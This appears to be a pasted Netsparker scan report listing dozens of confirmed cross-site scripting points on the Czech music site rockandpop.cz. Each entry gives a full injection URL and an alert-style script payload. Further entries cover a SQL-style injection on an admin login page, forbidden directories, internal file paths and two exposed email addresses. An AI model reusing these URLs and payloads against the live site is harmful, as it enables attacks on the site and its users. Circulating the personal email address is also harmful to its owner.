- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?'"--></style></script><script>alert(0x00079C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00079C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/stitky/?'"--></style></script><script>alert(0x0007A6)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0007A6)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/stitky/autori/ondrej-platzer/?'"--></style></script><script>alert(0x0007B2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0007B2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/asking-alexandria-while-she-sleeps-motionless-in-white-betraying-the-martyrs-roxy-praha/?'"--></style></script><script>alert(0x0007D4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0007D4)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/beneficni-koncert-pro-zvirata-v-nouzi-vol-2-plzen-divadlo-pod-lampou/?'"--></style></script><script>alert(0x00081E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00081E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/parkway-drive-emmure-the-word-alive-structures-meet-factory-praha/?'"--></style></script><script>alert(0x00081F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00081F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/?page='"--></style></script><script>alert(0x000825)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000825)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/sunshine-rozpoutali-v-plzni-hotovy-karmageddon/?'"--></style></script><script>alert(0x00082F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00082F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/seal-rozvasnil-karlovarskou-kv-arenu/?'"--></style></script><script>alert(0x00082A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00082A)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/muse-everything-everything-22-11-2012-praha-o2-arena/?'"--></style></script><script>alert(0x000831)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000831)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/into-darkness-tour-2012-17-11-masters-of-rock-cafe-zlin/?'"--></style></script><script>alert(0x000835)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000835)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/tribal-theory-pokrtili-v-andelu-debutove-album/?'"--></style></script><script>alert(0x000847)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000847)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/pipes-and-pints-pokrtili-novinku/?'"--></style></script><script>alert(0x000848)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000848)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/co-kdy-kde/?'"--></style></script><script>alert(0x00088F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00088F)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/live/hledani/?'"--></style></script><script>alert(0x0008B3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008B3)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/daniela-safarikova-2k12/?'"--></style></script><script>alert(0x0008B4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008B4)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/while-she-sleeps:-nase-jmeno-pochazi-od-chlapka-ktery-prisel-o-svou-chloubu/?'"--></style></script><script>alert(0x0008B6)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008B6)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/tomas-franta-2k12/?'"--></style></script><script>alert(0x0008C0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008C0)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/jak-to-slysi-nylon-jail/?'"--></style></script><script>alert(0x0008B7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008B7)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/jirka-mohl-2k12/?'"--></style></script><script>alert(0x0008C5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008C5)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/?page='"--></style></script><script>alert(0x0008C9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0008C9)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/jak-to-slysi-ille/?'"--></style></script><script>alert(0x0008F5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008F5)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/top-15-apokalyptickych-pisni/?'"--></style></script><script>alert(0x000918)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000918)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/usi:-jak-to-slysi/?'"--></style></script><script>alert(0x00092D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00092D)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/clanky/hledani/?'"--></style></script><script>alert(0x000942)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000942)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-1-13/?'"--></style></script><script>alert(0x00096C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00096C)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-11-12/?'"--></style></script><script>alert(0x000985)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000985)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-10-12/?'"--></style></script><script>alert(0x00098F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00098F)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/?page='"--></style></script><script>alert(0x000992)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000992)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-9-12/?'"--></style></script><script>alert(0x0009A4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0009A4)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-8-12/?'"--></style></script><script>alert(0x0009AA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-7-12/?'"--></style></script><script>alert(0x0009AE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0009AE)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rock-pop-6-12/?'"--></style></script><script>alert(0x0009F4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0009F4)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/5-12/?'"--></style></script><script>alert(0x0009FB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0009FB)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/uvodnik/?'"--></style></script><script>alert(0x000A0C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A0C)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/rozhovory/?'"--></style></script><script>alert(0x000A1E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A1E)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/recenze/?'"--></style></script><script>alert(0x000A20)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A20)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/elektronicky-casopis/?'"--></style></script><script>alert(0x000A23)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A23)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/zpravy/zahranicni/?page='"--></style></script><script>alert(0x000A26)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000A26)</script>
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/prodejni-mista/?'"--></style></script><script>alert(0x000A2C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A2C)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/hledani/?'"--></style></script><script>alert(0x000A42)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A42)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/casopis/vydavatel/?'"--></style></script><script>alert(0x000A39)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000A39)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/kuriozity/skryva-se-cobain-v-jizni-americe/?'"--></style></script><script>alert(0x000AAA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000AAA)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/?'"--></style></script><script>alert(0x000ABE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000ABE)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/a-banquet-climb-the-hill/?'"--></style></script><script>alert(0x000B08)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B08)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/pure-love-beach-of-diamonds/?'"--></style></script><script>alert(0x000B12)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B12)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/rihanna-diamonds/?'"--></style></script><script>alert(0x000B46)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B46)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/kieslowski-kratka-pisen-o-zabijeni/?'"--></style></script><script>alert(0x000B57)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B57)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/bjork-mutual-core/?'"--></style></script><script>alert(0x000B5A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B5A)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/sufjan-stevens-silver-gold/?'"--></style></script><script>alert(0x000B6F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B6F)</script>
- Severity: Important
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/video/videoklipy/the-tigger-lillies-living-hell/?'"--></style></script><script>alert(0x000B99)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000B99)</script>
- ||| Permanent XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/login.php?request='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&uwLanguage=cz
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.rockandpop.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage=cz%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000714)%3C%2Fscript%3E
- Parameter Name: request
- Parameter Type: Querystring
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
- User session sensitive information such as cookies can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
- ||| [Possible] Cross-site Scripting
- Severity : Medium
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/?'"--></style></script><script>alert(0x0000BE)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>netsparker(0x0000BE)</script>
- Severity : Medium
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage='"--></style></script><script>alert(0x0006FB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: uwLanguage
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0006FB)</script>
- Severity : Medium
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/underwood/index.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(netsparker(9))
- Severity : Medium
- Confirmation: Confirmed
- Detection Accuracy :
- URL: http://www.rockandpop.cz/underwood/index.php?'"--></style></script><script>alert(0x0007EA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>netsparker(0x0007EA)</script>
- ||| Forbidden Resource
- Summary
- Severity : Information
- Confirmation: Confirmed
- URL:
- http://www.rockandpop.cz/js/swfupload/
- http://www.rockandpop.cz/img/
- http://www.rockandpop.cz/js/
- http://www.rockandpop.cz/underwood/download/
- http://www.rockandpop.cz/underwood/download/files/
- http://www.rockandpop.cz/cache/images/topNewsBig/
- http://www.rockandpop.cz/cache/images/
- http://www.rockandpop.cz/cache/
- http://www.rockandpop.cz/cache/images/topNewsSmall/
- http://www.rockandpop.cz/cache/images/newsSmall/
- ||| E-mail Address Disclosure
- Severity : Information
- Found E-mails:
- online@rockandpop.cz
- lichnovsky-zdenek@centrum.cz
- ||| [Possible] Internal Path Leakage (Windows)
- Severity : Information
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- C:\Users\DAVIDX~1\AppData\Local\Temp\msohtmlclip1\01
- C:\temp\msohtml1\01
- C:\DOCUME~1\Ersian\LOCALS~1\Temp\msohtml1\01
- By © SHERWOOD Media s.r.o.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement